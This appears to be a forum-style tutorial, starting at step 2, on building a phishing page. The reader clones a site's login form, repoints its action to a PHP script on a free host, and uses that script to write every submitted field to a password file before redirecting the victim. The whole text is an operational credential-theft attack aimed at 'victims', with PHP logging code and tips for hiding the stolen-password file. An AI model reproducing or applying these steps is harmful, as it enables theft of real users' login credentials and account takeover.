-
2. When you found your site right click on it and say "view source" and save it on desktop as index.htm
-
3. Open the "index.htm" with notepad and find search the source for the word "action=". you should find a command looking like this
or anything alike and probably more inside like "id=" and "autocomplete=".
-
4. change the url (in this case "RANDOM URL") to "write.php"
-
5. If the method is "post" then change it to "get"
-
5. Save index.htm
-
6. Time to create a free website. It MUST SUPPORT .php files so i suggest the use of http://www.700megs.com. Create a free website.
-
7. login to your website and go to "file manager"
-
8. delete the file thats already there called "index.htm" and upload your "index.htm" (the one you just made)
-
9. Create a new file called "write.php" and copy / paste this:
-
$value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?
10. Switch out the word "WEBSITE" with the site the browser should go to after victim wrote his/her password. so it should say like this:
header("Location: http://hotmail.com ");
you might want to change the textfile name so others wont be able to view the file.
11. Save this file (write.php), and upload it to the subdomain aswell
13. test out your website. type in something in your phisher and then go to filemanager and open the password file, what you wrote should be typed here!, you can also access the password file by going to http://www.yourdomain.700megs.com/passwo